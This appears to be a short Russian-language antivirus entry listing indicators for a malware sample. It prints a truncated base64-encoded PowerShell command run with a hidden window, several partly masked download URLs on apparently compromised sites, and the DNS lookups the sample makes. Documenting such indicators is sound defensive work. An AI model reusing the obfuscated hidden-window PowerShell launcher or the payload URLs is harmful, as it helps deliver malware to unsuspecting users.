Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIAFQAWgBDAFcAegBoAGIAPQAnAEgAWABNAFgASgBsAHUAcQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAUgBpAHQAeQBQAFIATwBUAG8AYwBgAE8ATAAiACAAPQAgAC...
- http://ai#####ealthgroup.com/plugins/kb_r_5y5p44z9/
- http://we#####on-design.com/test/ul_tx_n6bfaag/
- http://wi###ube.com.br/assets/kudb3_i3gjx_y52/
- http://wo###ird.com/wp-content/2ddcr_bqmi2_d0vmdgu/
- DNS ASK ai#####ealthgroup.com
- DNS ASK wk####lutions.com
- DNS ASK we#####on-design.com
- DNS ASK wi###ube.com.br
- DNS ASK wo###ird.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIAFQAWgBDAFcAegBoAGIAPQAnAEgAWABNAFgASgBsAHUAcQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAUgBpAHQAeQBQAFIATwBUAG8AYwBgAE8ATAAiACAAPQAgAC...' (со скрытым окном)